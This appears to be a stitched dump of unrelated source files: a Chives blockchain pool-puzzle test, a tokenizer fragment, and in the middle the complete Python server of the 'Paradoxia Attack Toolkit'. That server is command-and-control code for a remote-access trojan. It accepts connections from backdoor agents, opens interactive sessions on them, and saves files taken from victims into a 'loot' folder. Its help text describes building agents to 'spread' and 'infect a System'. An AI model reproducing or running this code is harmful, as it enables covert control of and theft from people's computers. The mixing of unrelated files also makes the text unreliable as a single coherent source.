also need to the source of specific image
"""
pass
|
the-stack_0_19839 | import copy
from typing import List
from unittest import TestCase
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
from chives.types.blockchain_format.program import Program
from chives.types.blockchain_format.sized_bytes import bytes32
from chives.types.blockchain_format.coin import Coin
from chives.types.coin_spend import CoinSpend
from chives.types.spend_bundle import SpendBundle
from chives.util.ints import uint64, uint32
from chives.consensus.default_constants import DEFAULT_CONSTANTS
from chives.wallet.puzzles.p2_delegated_puzzle_or_hidden_puzzle import (
puzzle_for_pk,
solution_for_conditions,
calculate_synthetic_secret_key,
DEFAULT_HIDDEN_PUZZLE_HASH,
)
from chives.wallet.puzzles.p2_conditions import puzzle_for_conditions
from chives.wallet.puzzles import singleton_top_layer
from chives.pools.pool_wallet_info import PoolState
from chives.pools.pool_puzzles import (
create_waiting_room_inner_puzzle,
create_pooling_inner_puzzle,
create_p2_singleton_puzzle,
create_absorb_spend,
create_travel_spend,
get_most_recent_singleton_coin_from_coin_spend,
get_delayed_puz_info_from_launcher_spend,
SINGLETON_MOD_HASH,
launcher_id_to_p2_puzzle_hash,
is_pool_singleton_inner_puzzle,
get_pubkey_from_member_inner_puzzle,
solution_to_pool_state,
uncurry_pool_waitingroom_inner_puzzle,
get_seconds_and_delayed_puzhash_from_p2_singleton_puzzle,
)
from tests.util.key_tool import KeyTool
from tests.clvm.test_puzzles import (
public_key_for_index,
secret_exponent_for_index,
)
from tests.clvm.coin_store import CoinStore, CoinTimestamp, BadSpendBundleError
"""
This test suite aims to test:
- chives.pools.pool_puzzles.py
- chives.wallet.puzzles.pool_member_innerpuz.clvm
- chives.wallet.puzzles.pool_waiting_room_innerpuz.clvm
"""
# Helper function
def sign_delegated_puz(del_puz: Program, coin: Coin) -> G2Element:
synthetic_secret_key: PrivateKey = calculate_synthetic_secret_key(
PrivateKey.from_bytes(
secret_exponent_for_index(1).to_bytes(32, "big"),
),
DEFAULT_HIDDEN_PUZZLE_HASH,
)
return AugSchemeMPL.sign(
synthetic_secret_key,
(del_puz.get_tree_hash() + coin.name() + DEFAULT_CONSTANTS.AGG_SIG_ME_ADDITIONAL_DATA),
)
class TestPoolPuzzles(TestCase):
def test_pool_lifecycle(self):
# START TESTS
# Generate starting info
key_lookup = KeyTool()
sk: PrivateKey = PrivateKey.from_bytes(
secret_exponent_for_index(1).to_bytes(32, "big"),
)
pk: G1Element = G1Element.from_bytes(public_key_for_index(1, key_lookup))
starting_puzzle: Program = puzzle_for_pk(pk)
starting_ph: bytes32 = starting_puzzle.get_tree_hash()
# Get our starting standard coin created
START_AMOUNT: uint64 = 1023
coin_db = CoinStore()
time = CoinTimestamp(10000000, 1)
coin_db.farm_coin(starting_ph, time, START_AMOUNT)
starting_coin: Coin = next(coin_db.all_unspent_coins())
# LAUNCHING
# Create the escaping inner puzzle
GENESIS_CHALLENGE = bytes32.fromhex("ccd5bb71183532bff220ba46c268991a3ff07eb358e8255a65c30a2dce0e5fbb")
launcher_coin = singleton_top_layer.generate_launcher_coin(
starting_coin,
START_AMOUNT,
)
DELAY_TIME = uint64(60800)
DELAY_PH = starting_ph
launcher_id = launcher_coin.name()
relative_lock_height: uint32 = uint32(5000)
# use a dummy pool state
pool_state = PoolState(
owner_pubkey=pk,
pool_url="",
relative_lock_height=relative_lock_height,
state=3, # farming to pool
target_puzzle_hash=starting_ph,
version=1,
)
# create a new dummy pool state for travelling
target_pool_state = PoolState(
owner_pubkey=pk,
pool_url="",
relative_lock_height=relative_lock_height,
state=2, # Leaving pool
target_puzzle_hash=starting_ph,
version=1,
)
# Standard format comment
comment = Program.to([("p", bytes(pool_state)), ("t", DELAY_TIME), ("h", DELAY_PH)])
pool_wr_innerpuz: bytes32 = create_waiting_room_inner_puzzle(
starting_ph,
relative_lock_height,
pk,
launcher_id,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
pool_wr_inner_hash = pool_wr_innerpuz.get_tree_hash()
pooling_innerpuz: Program = create_pooling_inner_puzzle(
starting_ph,
pool_wr_inner_hash,
pk,
launcher_id,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# Driver tests
assert is_pool_singleton_inner_puzzle(pooling_innerpuz)
assert is_pool_singleton_inner_puzzle(pool_wr_innerpuz)
assert get_pubkey_from_member_inner_puzzle(pooling_innerpuz) == pk
# Generating launcher information
conditions, launcher_coinsol = singleton_top_layer.launch_conditions_and_coinsol(
starting_coin, pooling_innerpuz, comment, START_AMOUNT
)
# Creating solution for standard transaction
delegated_puzzle: Program = puzzle_for_conditions(conditions)
full_solution: Program = solution_for_conditions(conditions)
starting_coinsol = CoinSpend(
starting_coin,
starting_puzzle,
full_solution,
)
# Create the spend bundle
sig: G2Element = sign_delegated_puz(delegated_puzzle, starting_coin)
spend_bundle = SpendBundle(
[starting_coinsol, launcher_coinsol],
sig,
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
spend_bundle,
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# Test that we can retrieve the extra data
assert get_delayed_puz_info_from_launcher_spend(launcher_coinsol) == (DELAY_TIME, DELAY_PH)
assert solution_to_pool_state(launcher_coinsol) == pool_state
# TEST TRAVEL AFTER LAUNCH
# fork the state
fork_coin_db: CoinStore = copy.deepcopy(coin_db)
post_launch_coinsol, _ = create_travel_spend(
launcher_coinsol,
launcher_coin,
pool_state,
target_pool_state,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# Spend it!
fork_coin_db.update_coin_store_for_spend_bundle(
SpendBundle([post_launch_coinsol], G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# HONEST ABSORB
time = CoinTimestamp(10000030, 2)
# create the farming reward
p2_singleton_puz: Program = create_p2_singleton_puzzle(
SINGLETON_MOD_HASH,
launcher_id,
DELAY_TIME,
DELAY_PH,
)
p2_singleton_ph: bytes32 = p2_singleton_puz.get_tree_hash()
assert uncurry_pool_waitingroom_inner_puzzle(pool_wr_innerpuz) == (
starting_ph,
relative_lock_height,
pk,
p2_singleton_ph,
)
assert launcher_id_to_p2_puzzle_hash(launcher_id, DELAY_TIME, DELAY_PH) == p2_singleton_ph
assert get_seconds_and_delayed_puzhash_from_p2_singleton_puzzle(p2_singleton_puz) == (DELAY_TIME, DELAY_PH)
coin_db.farm_coin(p2_singleton_ph, time, 1750000000000)
coin_sols: List[CoinSpend] = create_absorb_spend(
launcher_coinsol,
pool_state,
launcher_coin,
2,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH, # height
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle(coin_sols, G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# ABSORB A NON EXISTENT REWARD (Negative test)
last_coinsol: CoinSpend = list(
filter(
lambda e: e.coin.amount == START_AMOUNT,
coin_sols,
)
)[0]
coin_sols: List[CoinSpend] = create_absorb_spend(
last_coinsol,
pool_state,
launcher_coin,
2,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH, # height
)
# filter for only the singleton solution
singleton_coinsol: CoinSpend = list(
filter(
lambda e: e.coin.amount == START_AMOUNT,
coin_sols,
)
)[0]
# Spend it and hope it fails!
try:
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([singleton_coinsol], G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
except BadSpendBundleError as e:
assert str(e) == "condition validation failure Err.ASSERT_ANNOUNCE_CONSUMED_FAILED"
# SPEND A NON-REWARD P2_SINGLETON (Negative test)
# create the dummy coin
non_reward_p2_singleton = Coin(
bytes32(32 * b"3"),
p2_singleton_ph,
uint64(1337),
)
coin_db._add_coin_entry(non_reward_p2_singleton, time)
# construct coin solution for the p2_singleton coin
bad_coinsol = CoinSpend(
non_reward_p2_singleton,
p2_singleton_puz,
Program.to(
[
pooling_innerpuz.get_tree_hash(),
non_reward_p2_singleton.name(),
]
),
)
# Spend it and hope it fails!
try:
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([singleton_coinsol, bad_coinsol], G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
except BadSpendBundleError as e:
assert str(e) == "condition validation failure Err.ASSERT_ANNOUNCE_CONSUMED_FAILED"
# ENTER WAITING ROOM
# find the singleton
singleton = get_most_recent_singleton_coin_from_coin_spend(last_coinsol)
# get the relevant coin solution
travel_coinsol, _ = create_travel_spend(
last_coinsol,
launcher_coin,
pool_state,
target_pool_state,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# Test that we can retrieve the extra data
assert solution_to_pool_state(travel_coinsol) == target_pool_state
# sign the serialized state
data = Program.to(bytes(target_pool_state)).get_tree_hash()
sig: G2Element = AugSchemeMPL.sign(
sk,
(data + singleton.name() + DEFAULT_CONSTANTS.AGG_SIG_ME_ADDITIONAL_DATA),
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([travel_coinsol], sig),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# ESCAPE TOO FAST (Negative test)
# find the singleton
singleton = get_most_recent_singleton_coin_from_coin_spend(travel_coinsol)
# get the relevant coin solution
return_coinsol, _ = create_travel_spend(
travel_coinsol,
launcher_coin,
target_pool_state,
pool_state,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# sign the serialized target state
sig = AugSchemeMPL.sign(
sk,
(data + singleton.name() + DEFAULT_CONSTANTS.AGG_SIG_ME_ADDITIONAL_DATA),
)
# Spend it and hope it fails!
try:
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([return_coinsol], sig),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
except BadSpendBundleError as e:
assert str(e) == "condition validation failure Err.ASSERT_HEIGHT_RELATIVE_FAILED"
# ABSORB WHILE IN WAITING ROOM
time = CoinTimestamp(10000060, 3)
# create the farming reward
coin_db.farm_coin(p2_singleton_ph, time, 1750000000000)
# generate relevant coin solutions
coin_sols: List[CoinSpend] = create_absorb_spend(
travel_coinsol,
target_pool_state,
launcher_coin,
3,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH, # height
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle(coin_sols, G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# LEAVE THE WAITING ROOM
time = CoinTimestamp(20000000, 10000)
# find the singleton
singleton_coinsol: CoinSpend = list(
filter(
lambda e: e.coin.amount == START_AMOUNT,
coin_sols,
)
)[0]
singleton: Coin = get_most_recent_singleton_coin_from_coin_spend(singleton_coinsol)
# get the relevant coin solution
return_coinsol, _ = create_travel_spend(
singleton_coinsol,
launcher_coin,
target_pool_state,
pool_state,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH,
)
# Test that we can retrieve the extra data
assert solution_to_pool_state(return_coinsol) == pool_state
# sign the serialized target state
data = Program.to([pooling_innerpuz.get_tree_hash(), START_AMOUNT, bytes(pool_state)]).get_tree_hash()
sig: G2Element = AugSchemeMPL.sign(
sk,
(data + singleton.name() + DEFAULT_CONSTANTS.AGG_SIG_ME_ADDITIONAL_DATA),
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle([return_coinsol], sig),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
# ABSORB ONCE MORE FOR GOOD MEASURE
time = CoinTimestamp(20000000, 10005)
# create the farming reward
coin_db.farm_coin(p2_singleton_ph, time, 1750000000000)
coin_sols: List[CoinSpend] = create_absorb_spend(
return_coinsol,
pool_state,
launcher_coin,
10005,
GENESIS_CHALLENGE,
DELAY_TIME,
DELAY_PH, # height
)
# Spend it!
coin_db.update_coin_store_for_spend_bundle(
SpendBundle(coin_sols, G2Element()),
time,
DEFAULT_CONSTANTS.MAX_BLOCK_COST_CLVM,
DEFAULT_CONSTANTS.COST_PER_BYTE,
)
|
the-stack_0_19840 | """
Have a good time reading the source. You are an amazing person.
"""
import socket
import _thread
from .infodb import *
from .session import run_session
import configparser
from os import stat
from os import path
from .builder import create_agent
import os
import subprocess
from kernel.banner import pbanner
from .notif import notify
from colorama import Fore, Style
import colorama
from .scanner import *
import tqdm
colorama.init()
global client, addr
clients = []
oslist = []
iplist = []
wan_ip_list = []
blacklist = []
isSession = False
infodb = configparser.ConfigParser()
settings = configparser.ConfigParser()
try:
settings.read("paradoxia.ini")
server_settings = settings['server']
bot_settings = settings['bot']
except Exception as e:
print(str(e))
exit(True)
def SendData(csocket, data):
csocket = int(csocket)
sockfd = clients[csocket]
try:
sockfd.send(data.encode())
except Exception as error:
clients.remove(sockfd)
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error))
def SendFData(csocket, data):
csocket = int(csocket)
sockfd = clients[csocket]
try:
sockfd.send(data.encode())
except Exception as error:
clients.remove(sockfd)
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error))
def SendBytes(csocket, data):
""" Binary File Content is sent without Encryption """
csocket = int(csocket)
sockfd = clients[csocket]
try:
sockfd.send(data)
except Exception as error:
clients.remove(sockfd)
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error))
def clear():
if(os.name == "nt"):
os.system("cls")
else:
os.system("clear")
def botlist():
return str(len(clients))
def AllBotNames():
if(len(clients) > 0):
for i in range(len(iplist)):
return BOTNAMEONLY(iplist[i])
else:
return "-"
def broadcast(data):
try:
for i in clients:
i.send(data.encode())
except Exception as error:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error))
def ReceiveThread(ip, port, csocket, wanip, operating_system):
"""
This function runs in a Thread and receives data
from the client.
"""
def clearLists():
try:
clients.remove(csocket)
iplist.remove(ip)
wan_ip_list.remove(wanip)
oslist.remove(operating_system)
except ValueError:
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Socket not in list.")
while(True):
try:
def uniquify(path):
"""
Credits : https://stackoverflow.com/questions/13852700/create-file-but-if-name-exists-add-number/57896232#57896232
"""
filename, extension = os.path.splitext(path)
counter = 1
while os.path.exists(path):
path = filename + " (" + str(counter) + ")" + extension
counter += 1
return path
response = csocket.recv(1024).decode()
if(not response):
clearLists()
print("[!] BOT disconnected.")
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
break
if(response.startswith("savethis")):
print("\n[+] Incoming file..")
fpath = "loot/"+BOTNAMEONLY(wanip).replace("/", "-")
try:
os.mkdir(fpath)
except FileExistsError:
pass
except Exception as e:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error : " + str(e))
try:
f = response.split("=")
csocket.settimeout(10)
try:
full_file = uniquify(fpath+"/"+f[1])
with open(full_file, "wb") as received_file:
data = csocket.recv(4096)
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloading file '{fl}' in '{fd}'".format(fl=f[1], fd=full_file))
while(data):
received_file.write(data)
data = csocket.recv(4096)
if not data: break
except socket.timeout:
csocket.settimeout(None)
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloaded file '"+f[1] +"'.")
try:
sa = stat(full_file)
print(
"\nOriginal Filename : {filename}\nSize : {size} bytes\nSaved in : '{fp}'".format(
filename = f[1],
size = str(sa.st_size),
fp = str(path.dirname(path.abspath(fpath+"/"+f[1])))
)
)
except FileNotFoundError:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] File not Downloaded.")
except IndexError:
print("Error.")
else:
# if(isSession == True):
#print(str(response))
# else:
print("\n["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL +"] "+ip+":"+port+" -\n" + str(response))
except UnicodeDecodeError as ude:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Unicode Decode error : " + str(ude))
except UnicodeEncodeError as eEe:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Unicode Encode error : " + str(eEe))
except ConnectionAbortedError as cAe:
# cAe : Connection Aborted Error :v
clearLists()
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cAe))
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
break
except ConnectionError as cE:
# cE : Connection Error :'v
clearLists()
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cE))
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
break
except ConnectionRefusedError as cRe:
# cRe : Connection Refused Error ;'v
clearLists()
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cRe))
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
break
except ConnectionResetError as cRetwo:
clearLists()
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cRetwo))
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
break
except socket.error as se:
# for sockfd in clients:
# clients.remove(sockfd)
clearLists()
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(se))
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
break
except Exception as recv_error:
clearLists()
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(recv_error))
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online Bots : " + str(len(clients)))
break
def MainServer():
"""
This is the main server where backdoors connect
"""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 1)
server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 1)
server.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 5)
host = server_settings['host']
port = int(server_settings['port'])
blist = open("blacklist", "r")
bl_ips = blist.readlines()
for i in range(len(bl_ips)):
if("#" in bl_ips[i]):
pass
else:
blacklist.append(bl_ips[i])
try:
server.bind((host, port))
except PermissionError:
print("["+Style.BRIGHT + Fore.LIGHTYELLOW_EX + "^" + Style.RESET_ALL + "] Run as sudo.")
exit(True)
except Exception as i:
raise i
try:
server.listen(5)
#print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] TCP Server running. ({host}:{port})".format(host=host, port=server_settings['port']))
except KeyboardInterrupt:
print(" Keyboard Interrupt, Exit.")
exit()
except Exception as errunknown:
print(str(errunknown))
while(True):
client, addr = server.accept()
if(addr[0] in blacklist):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] New Connection form blacklisted IP " + str(addr[0]) +":"+ str(addr[1]))
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Connection Closed.")
client.shutdown(socket.SHUT_RDWR)
client.close()
break
clients.append(client)
iplist.append(str(addr[0]))
if(bot_settings['verbose'] == "True"):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] New connection from " + str(addr[0]) +":"+ str(addr[1]))
try:
pw = bot_settings['password']
if(bot_settings['verbose'] == "True"):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Sending Password : "+pw + " ..")
client.send(pw.encode())
client.settimeout(10)
try:
# Set 10 seconds timeout to wait for client
pwInfo = client.recv(1024).decode()
if(pwInfo.startswith("INCORRENT PASSWORD.")):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] " + pwInfo + ". Password Rejected by Agent.")
clients.remove(client)
iplist.remove(str(addr[0]))
break
except socket.timeout:
client.settimeout(None)
print("\n[+] Timed out, Client did not send a Response.")
print("\n[+] Forwarding to Scanner {ip}:{port}..".format(ip=str(addr[0]), port=str(addr[1])))
scan_ip(addr[0])
client.shutdown(socket.SHUT_RDWR)
client.close()
clients.remove(client)
iplist.remove(addr[0])
break
client.settimeout(None)
if(bot_settings['verbose'] == "True"):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] " + pwInfo)
# Receive Wan ip for file name
client.send("wanip".encode())
wanip = client.recv(1024).decode()
client.send("os".encode())
os = client.recv(1024).decode()
wan_ip_list.append(wanip)
oslist.append(os)
except ConnectionResetError as cRe:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ERROR : " + str(cRe) + ". Most likely password was rejected.")
clients.remove(client)
iplist.remove(str(addr[0]))
oslist.remove(os)
except ConnectionAbortedError as cAe:
print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ERROR : " + str(cAe) + ". Most likely password was rejected.")
clients.remove(client)
iplist.remove(str(addr[0]))
oslist.remove(os)
if(wanip.startswith(("No"))):
filename = "bots/"+str(addr[0])
else:
filename = "bots/"+str(wanip)
if(bot_settings['verbose'] == "True"):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Getting information..")
SaveInformation(client, filename)
notify(str(addr[0]), str(addr[1]), str(len(clients)))
# default
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] " + str(addr[0])+":"+str(addr[1])+ " is online.")
_thread.start_new_thread(ReceiveThread, (str(addr[0]), str(addr[1]), client, wanip, os,))
def console():
def list_bots():
print("\nActive Sessions (" + str(len(clients)) +")")
print("===================================")
try:
if(len(clients) > 0):
for i in range(len(iplist)):
print(
"\n[ SESSION ID : "+str(i) +" ][ Connection : "+iplist[i] + " ][ WAN : "+wan_ip_list[i] +" ][ OPERATING SYSTEM : " + oslist[i] + " ]"
)
except Exception as stre:
print("Error : " + str(stre))
_thread.start_new_thread(MainServer, ())
while(True):
try:
command = input("paradoxia> ")
args = command.split()
if(command == "help"):
print(
"""
HELP
-------------
~ Console Commands :
---------------------------
+ list/sessions - List online clients.
+ settings - View settings.
+ session - Interact with a Client.
- USAGE : session <session id>
+ kill - Kill a connection.
- USAGE : kill <session id>
+ blacklist - Blacklist an IP address.
- USAGE : blacklist <ip>
+ bytecheck - (Misc) Check the size of a string.
- (NOTE : This was added for cryptographic testing and is useless for a user. Useful for developer.)
+ botinfo - View information of a Connection BOT/Client.
+ banner - Print banner.
+ build lhost=<lhost> lport=<lport> - Build the agent.
+ exit - Exit.
PARADOXIA Attack Toolkit
Created by : QuantumCore (Fahad)
Github : https://github.com/quantumcore
Official Repository : https://github.com/quantumcored/paradoxia
Discord Server : https://discordapp.com/invite/8snh7nx
"""
)
elif(command.startswith("blacklist")):
try:
bargs = command.split()
if(len(bargs[1]) > 0):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Blacklisting IP : {ip}.\n |_ View file 'blacklist' to allow.".format(ip = bargs[1]))
with open("blacklist", "a+") as blacklist:
blacklist.write("\n"+bargs[1])
else:
print("USAGE : blacklist < ip > ")
except FileNotFoundError:
print("CRITICAL : Blacklist file not found. Contact Developer.")
except IndexError:
print("USAGE : blacklist < ip > ")
elif(command == "settings"):
print(
"["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] TCP Server Host : " + server_settings['host'] +
"\n["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] TCP Server Port : " + server_settings['port'] +
"\n["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Print BOT INFO on connect : " + bot_settings['auto_print_bot_info'] +
"\n["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] BOT Password : " + bot_settings['password']
)
elif(command == "list" or command == "sessions"):
list_bots()
elif(command.startswith("session")):
s = command.split()
try:
sid = int(s[1])
prefix = BOTNAMEONLY(wan_ip_list[sid]).split("/")
prmpt = prefix[1].strip() + "("+Fore.RED+ Style.BRIGHT + wan_ip_list[sid] + Style.RESET_ALL +") > "
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Session opened for Client ID {id}.".format(id=str(sid)))
isSession = True
run_session(clients[sid],isSession, prmpt, sid, iplist[sid])
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Session closed for Client ID {id}.".format(id=str(sid)))
except IndexError:
try:
print("CID {s} not online.".format(s=s[1]))
except IndexError:
print("USAGE : session < session id> ")
except Exception as es:
print("Error! ("+str(es)+")")
elif(command == "bytecheck"):
message = input("Input : ")
msgsize = str(len(message)) + " Bytes."
if(len(message) > 100):
print("\nYour Input : " + message + "\nSize : " + msgsize + "\n(Not Eligible for Password)")
else:
print("\nYour Input : " + message + "\nSize : " + msgsize + "\n(Eligible for Password)")
elif(command.startswith("kill")):
try:
cid = int(args[1])
SendData(cid, "kill")
clients[cid].shutdown(socket.SHUT_RDWR)
clients[cid].close()
except IndexError:
print("USAGE : kill <session id>")
elif(command.startswith("build")):
try:
lh = args[1].split("=")
lp = args[2].split("=")
create_agent(lh[1], lp[1], args[3])
except IndexError:
print("""
[X] USAGE : build lhost=<lhost> lport=<lport> <static>/<normal>
LHOST - Ipv4 Address of Server to Connect to.
LPORT - Port of Server to Connect to.
static - Standalone Executable to run on almost any System.
normal - Executable that requires libraries to run.
EXAMPLES :
[+] build lhost=192.168.0.101 lport=443 static
|- Size : Around 2.1 MB.
|- This will generate an Executable that you can easily spread
without worrying that it will work or not.
[+] build lhost=192.168.0.101 lport=443 normal
|- Size : Around 600 kb.
|- This will generate an Executable that you can use for tests
on your own PC. Or infect a System which an environment where
it can run.
""")
elif(command.startswith("botinfo")):
try:
infoFor = iplist[int(args[1])]
ReadInformation(infoFor)
except IndexError:
print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] USAGE : botinfo < cid > / botinfo -offline")
except ValueError:
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Loading offline bots..")
fl = os.listdir("bots")
fl.remove("readme.md")
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Offline Bots")
try:
for x in range(len(fl)):
print("""
[{index}] - [ {wanip} ] [ {os} ] [ {hname} ]
""".format(
index=str(x),
wanip=fl[x].replace(".ini", ""),
os=BOTOSONLY("bots/"+fl[x].replace(".ini", "")),
hname=BOTNAMEONLY("bots/"+fl[x].replace(".ini", ""))
))
ask = input("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Enter Index : ")
if(len(ask) > 0):
fsp = fl[int(ask)]
ReadInformation("bots/"+fsp.replace(".ini", ""))
except Exception as UnknownException:
print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Error : " + str(UnknownException))
elif(command == "banner"):
print(pbanner())
elif(command.startswith("send")):
try:
cid = args[1]
SendData(cid, args[2])
except IndexError:
print("USAGE : send <id> <data>")
elif(command == "exit"):
if(len(clients) > 0):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] You have online bots? Kill the connections?")
yn = input("Your Desicion (y/N) : ").lower()
if(yn == "y"):
broadcast("kill")
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Disconnected everyone.")
exit(True)
else:
pass
else:
exit(True)
else:
if(len(command) > 0):
try:
print(Style.BRIGHT + Fore.LIGHTCYAN_EX )
subprocess.run(['bash', '-c', command])
print(Style.RESET_ALL)
except Exception as procError:
print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Error : " + str(procError))
except KeyboardInterrupt:
print(" = Interrupt. Type Exit to exit.")
|
the-stack_0_19844 | from tokenizers import Tokenizer, AddedToken, pre_tokenizers, decoders, trainers
from tokenizers.models import BPE
from tokenizers.normalizers import NFKC
from .base_tokenizer import BaseTokenizer
from typing import Optional, List, Union, Dict, Tuple, Iterator
class SentencePieceBPETokenizer(BaseTokenizer):
"""SentencePiece BPE Tokenizer
Represents the BPE algorithm, with the pretokenization used by SentencePiece
"""
def __init__(
self,
vocab: Optional[Union[str, Dict[str, int]]] = None,
merges: Optional[Union[str, Dict[Tuple[int, int], Tuple[int, int]]]] = None,
unk_token: Union[str, AddedToken] = "<unk>",
